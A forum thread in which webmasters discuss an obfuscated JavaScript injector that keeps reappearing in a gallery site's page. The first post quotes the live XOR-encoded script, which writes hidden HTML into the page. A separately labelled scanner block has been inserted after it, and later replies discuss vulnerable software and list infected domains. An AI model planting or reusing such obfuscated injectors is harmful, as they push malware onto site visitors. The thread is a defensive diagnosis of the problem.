javascript trojan on my tgp

  • eMonk
    Confirmed User
    • Aug 2003
    • 2310

    #1

    javascript trojan on my tgp

    the following javascript code keeps on reappearing on my tgp site. has anyone dealt with this trojan before? i can temporarily remove it by deleting my index.shtml file and rebuilding it but it keeps coming back. here's the javascript code:

    <script language="JavaScript">
    // the key '0x0022' is coerced to the number 0x22 in the XOR below; the %XX string is the hidden HTML, one token per character (the spaces in the original post are forum wrap artifacts and are removed here)
    e = '0x00' + '22';str1 = "%99%C1%CA%D7%BD%D0%D1%DA%C9%C6%9E%83%D7%CA%D0%CA%C3%CA%C9%CA%D1%DA%9B%C5%CA%C1%C1%C6%CF%83%9F%99%CA%C7%D3%C2%CE%C6%BD%D0%D3%C0%9E%83%C5%D1%D1%CD%9B%8C%8C%C1%CF%D7%8E%C0%CC%D6%CF%D1%C6%D3%8F%C0%CC%CE%8C%D1%D3%C7%8C%83%BD%D4%CA%C1%D1%C5%9E%92%BD%C5%C6%CA%C4%C5%D1%9E%92%9F%99%8C%CA%C7%D3%C2%CE%C6%9F%99%8C%C1%CA%D7%9F%BD%AE%AB";
    // each 3-char token is unescaped to a byte, XORed with the key and shifted down by 127 to recover the hidden HTML, which is then written straight into the page
    str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);
    </script>

    my system was infected with a trojan but its been cleaned and removed. please advise.
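    Added example, not the thread's or the poster's code: a defender-side scanner that flags the unescape/fromCharCode/XOR decoder pattern from the block above in page files and reverses the transform offline (no eval, no document.write) so the hidden HTML can be read during cleanup. The sample page, the placeholder iframe and the key 0x22 are constructed for the demonstration.

```javascript
// Added example (not the thread's code); the sample page at the bottom is constructed.

// The decoder in the thread reads 3-char %XX tokens, XORs each byte with the key and
// subtracts 127. This reproduces that arithmetic on a string and returns the result.
function decodeXorPayload(str1, key) {
  let out = '';
  for (let i = 0; i < str1.length; i += 3) {
    const tok = str1.slice(i, i + 3);
    if (!/^%[0-9A-Fa-f]{2}$/.test(tok)) return null; // not this token scheme
    out += String.fromCharCode((parseInt(tok.slice(1), 16) ^ key) - 127);
  }
  return out;
}

// Inverse transform; used here only to build the constructed sample page.
function encodeXorPayload(text, key) {
  let s = '';
  for (const ch of text) {
    const b = ((ch.charCodeAt(0) + 127) ^ key) & 0xff;
    s += '%' + b.toString(16).toUpperCase().padStart(2, '0');
  }
  return s;
}

// Hallmarks of the injector: a key built from '0x00', a long %XX string, and
// unescape + fromCharCode + XOR with the key + document.write in one <script>.
const SCRIPT_RE = /<script[^>]*>([\s\S]*?)<\/script>/gi;
const KEY_RE = /e\s*=\s*'0x00'\s*\+\s*'([0-9A-Fa-f]{2})'/;
const PAYLOAD_RE = /str1\s*=\s*"((?:%[0-9A-Fa-f]{2}){8,})"/;

// One record per suspicious <script>: offset in the file, recovered key, decoded payload.
function findInjectedScripts(html) {
  const hits = [];
  let m;
  while ((m = SCRIPT_RE.exec(html)) !== null) {
    const body = m[1];
    const looksLikeDecoder = /unescape\(/.test(body) && /fromCharCode/.test(body) &&
      /\^\s*e\b/.test(body) && /document\.write/.test(body);
    if (!looksLikeDecoder) continue;
    const k = KEY_RE.exec(body);
    const p = PAYLOAD_RE.exec(body);
    const key = k ? parseInt(k[1], 16) : null;
    hits.push({ offset: m.index, key, decoded: key !== null && p ? decodeXorPayload(p[1], key) : null });
  }
  return hits;
}

// Constructed sample: a clean page with the block appended at the bottom, as the thread
// describes. The hidden HTML is a placeholder, not the thread's real payload.
const HIDDEN = '<iframe src="http://example.invalid/placeholder" width=1 height=1></iframe>';
const SAMPLE_PAGE = '<html><body><h1>gallery</h1>\n<script language="JavaScript">\n' +
  "e = '0x00' + '22';str1 = \"" + encodeXorPayload(HIDDEN, 0x22) + '";' +
  "str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));" +
  'str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);\n' +
  '</script></body></html>';
```

    Run `findInjectedScripts` over each .shtml/.html file and template on the server; a non-empty result tells you which files carry the block and what it would have rendered, which is the first thing to look for in the raw logs mentioned later in the thread.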
  • Quickdraw
    Confirmed User
    • Mar 2004
    • 1717

    #2
    you are not alone. There are a whole bunch of sites out there getting hit.

    Check the scripts you are using on that site. Most likely that is how they got in. Check cron files and so on. And of course contact your host, they might have the poop on this stuff.

    • 4Pics
      Confirmed User
      • Dec 2001
      • 7952

      #3
      What tgp and trading scripts are you using?

      Are you running phpbb by chance on the server?

      • eMonk
        Confirmed User
        • Aug 2003
        • 2310

        #4
        Originally posted by 4Pics
        What tgp and trading scripts are you using?

        Are you running phpbb by chance on the server?
        auto gallery pro & arrow trader lite 3.

        • eMonk
          Confirmed User
          • Aug 2003
          • 2310

          #5
          Originally posted by Quickdraw
          you are not alone. There are a whole bunch of sites out there getting hit.

          Check the scripts you are using on that site. Most likely that is how they got in. Check cron files and so on. And of course contact your host, they might have the poop on this stuff.
          no clues in the crontab & host says it's due to an unsecure script.

          • darnit
            Confirmed User
            • Jul 2001
            • 2439

            #6
            Originally posted by MUNK
            no clues in the crontab & host says it's due to an unsecure script.
            What host and were they more specific? If it's a managed box from any of the larger hosts I would expect a better response/support than that, considering how prevalent that exploit seems to be.

            • eMonk
              Confirmed User
              • Aug 2003
              • 2310

              #7
              Originally posted by darnit
              What host and were they more specific? If it's a managed box from any of the larger hosts I would expect a better response/support than that, considering how prevalent that exploit seems to be.
              i'm with webair and using their starter plan.

              • pr0
                rockin tha trailerpark
                • May 2001
                • 23088

                #8
                whats it do, prompt to download an exe?
                __________
                Loadedca$h - get sum! - Revengebucks - mmm rebills! - webair (gotz sErVrz)

                • eMonk
                  Confirmed User
                  • Aug 2003
                  • 2310

                  #9
                  Originally posted by pr0
                  whats it do, prompt to download an exe?
                  once you load the page, anti-virus program picks it up as a trojan.

                  i just changed my admin password in case and deleted my infected index.shtml file and rebuilt the page. it's clean now but the javascript code usually reappears within a few hours. hopefully not this time. <crosses fingers>

                  • pr0
                    rockin tha trailerpark
                    • May 2001
                    • 23088

                    #10
                    yea but i wonder what kind of trojan it could possibly be...whats it doing to the surfers
                    __________
                    Loadedca$h - get sum! - Revengebucks - mmm rebills! - webair (gotz sErVrz)

                    • darnit
                      Confirmed User
                      • Jul 2001
                      • 2439

                      #11
                      Originally posted by MUNK
                      i'm with webair and using their starter plan.
                      That actually was a surprising and unexpected reply. I use webair but have a dedicated server. I don't know if there are different tiers of support based on the plans however webair has always provided impeccable support and assistance whenever I have had problems - often spending hours on the phone or via live chat to assist.

                      I haven't encountered your specific dilemma however so I can't vouch for what their terms of service are in each particular instance of support requests.

                      Perhaps try hitting them up again?

                      I wish I could assist however I'm all thumbs when it comes to scripts and security, hence my dependence on a good host that will provide that for me.

                      • eMonk
                        Confirmed User
                        • Aug 2003
                        • 2310

                        #12
                        Originally posted by pr0
                        yea but i wonder what kind of trojan it could possibly be...whats it doing to the surfers
                        i believe it's called trojan-downloader.html.agent.aq

                        • darnit
                          Confirmed User
                          • Jul 2001
                          • 2439

                          #13
                          Originally posted by pr0
                          yea but i wonder what kind of trojan it could possibly be...whats it doing to the surfers
                          I would place good money on it not playing nice. Sucks for his bookmarkers as they would have no idea that it wasn't his fault.

                          Perhaps once you get your site clean you should provide links to some free removal software such as adaware, avgfree, MS anti spyware, etc. on your site and explain why they should use them.

                          • eMonk
                            Confirmed User
                            • Aug 2003
                            • 2310

                            #14
                            Originally posted by darnit
                            That actually was a surprising and unexpected reply. I use webair but have a dedicated server. I don't know if there are different tiers of support based on the plans however webair has always provided impeccable support and assistance whenever I have had problems - often spending hours on the phone or via live chat to assist.

                            I haven't encountered your specific dilemma however so I can't vouch for what their terms of service are in each particular instance of support requests.

                            Perhaps try hitting them up again?

                            I wish I could assist however I'm all thumbs when it comes to scripts and security, hence my dependence on a good host that will provide that for me.
                            i don't have any complaints with webair or their support. i contacted them via email and was told, "It can usually be attributed to an unsecure script", so i'm contacting the script creators and going to see what they say about this.

                            • eMonk
                              Confirmed User
                              • Aug 2003
                              • 2310

                              #15
                              Originally posted by darnit
                              I would place good money on it not playing nice. Sucks for his bookmarkers as they would have no idea that it wasn't his fault.

                              Perhaps once you get your site clean you should provide links to some free removal software such as adaware, avgfree, MS anti spyware, etc. on your site and explain why they should use them.
                              providing my bookmarkers with free software is a great idea. i'll get some links up later today.

                              • SmokeyTheBear
                                ►SouthOfHeaven
                                • Jun 2004
                                • 28609

                                #16
                                dude contact webair and tell them to tell you what the problem is for sure , you shouldn't be left guessing.. or find a new host..

                                I'm with webair , and they have always answered my questions promptly , sometimes people give bland answers ask for facts..

                                a lot of people asking me about this trojan lately.. prob the "spysheriff" version and its prob set to a cronjob or something on a schedule to reinfect you so it wont just "go away " on its own or by deleting anything

                                do you have any blog software ? wordpress seems to be a common target .. cpanel also has some problems lately.. so make sure you're up to date..
                                hatisblack at yahoo.com

                                • darnit
                                  Confirmed User
                                  • Jul 2001
                                  • 2439

                                  #17
                                  Originally posted by SmokeyTheBear
                                  dude contact webair and tell them to tell you what the problem is for sure , you shouldn't be left guessing.. or find a new host..

                                  I'm with webair , and they have always answered my questions promptly , sometimes people give bland answers ask for facts..

                                  a lot of people asking me about this trojan lately.. prob the "spysheriff" version and its prob set to a cronjob or something on a schedule to reinfect you so it wont just "go away " on its own or by deleting anything

                                  do you have any blog software ? wordpress seems to be a common target .. cpanel also has some problems lately.. so make sure you're up to date..
                                  Bump for STB. He certainly knows his shit and his advice is dead on. Btw if that is the spysheriff virus also instruct your surfers to chargeback if they do fall for the spysheriff pitch. It's basically ransomware that takes over the computer and charges users for their software to "remove" what they have been responsible for installing. Nasty shit. I also found these other posts with the identical problem. Hope they are helpful.

                                  http://www.gofuckyourself.com/showthread.php?t=611063
                                  http://www.gofuckyourself.com/showthread.php?t=561290
                                  http://www.gofuckyourself.com/showthread.php?t=559591

                                  • Linkster
                                    Confirmed User
                                    • Feb 2003
                                    • 3216

                                    #18
                                    If you have access to raw logs check to see if it was just placed on the page and uploaded - this has been the most common way pages had this installed - most likely due to someone with access to a password file as there are never any intrusion attempts and the page is just ftp'd - most people that were hit were using a common password on their server and either a processing program or sponsor (we haven't found the common one yet to figure out whose password list was compromised)

                                    The second way is one of these programs with security holes:
                                    Vbulletin
                                    PHPBB
                                    Autolinks
                                    Invision Power Board
                                    phpmyadmin
                                    phpadsnew
                                    wordpress
                                    awstats 6.5
                                    sitedepth
                                    I-RATER
                                    phpBazar

                                    Most of these have recently released updates for their security holes
                                    Porn Links Crak for your bank account - Get Addicted
                                    FREE LIVE CAM SHOWS

                                    • eMonk
                                      Confirmed User
                                      • Aug 2003
                                      • 2310

                                      #19
                                      i don't have access to raw log files but i changed my admin password before i went to bed and my page is still clean.

                                      • Quickdraw
                                        Confirmed User
                                        • Mar 2004
                                        • 1717

                                        #20
                                        Have you checked the templates in your scripts?

                                        Here are a few more url's with the same script, in case anyone knows the owners.

                                        wanktool.com
                                        teensinboots.com/index.shtml
                                        technorgasmic.com
                                        nastylatex.com/index.shtml
                                        pornlinks-united.com

                                        • Gambit
                                          Confirmed User
                                          • Nov 2005
                                          • 571

                                          #21
                                          As far as i know, the guy that does it is using an exploit in autogallery to stick the trojan on your site.
                                          Promote http://www.tiedvirgins.com for amazing bondage conversions. CCbill 50/50.

                                          • eMonk
                                            Confirmed User
                                            • Aug 2003
                                            • 2310

                                            #22
                                            Originally posted by Quickdraw
                                            Have you checked the templates in your scripts?
                                            one of my toplist templates had the javascript code & i removed it. it came back again but in a different section of the shtml file. it keeps coming back after i clean it but in different locations of the shtml file. the javascript code is always found at the bottom portion of the shtml file. it hasn't reappeared ever since i changed my admin password last night before i went to bed.

                                            • Corona
                                              Confirmed User
                                              • Feb 2002
                                              • 2185

                                              #23
                                              I got it a week or so ago and so far it only appeared just that once. The only scripts I am using on that site are phpadsnew and Links 2.0
                                              I was looking for a job, and then I found a job
                                              And heaven knows I'm miserable now

                                              • Mighty Chin
                                                Confirmed User
                                                • Aug 2003
                                                • 781

                                                #24
                                                Yup had it as well. just deleted the code and changed my server password
                                                Do you need design work done? I am available, check out my site TMC Web Designs
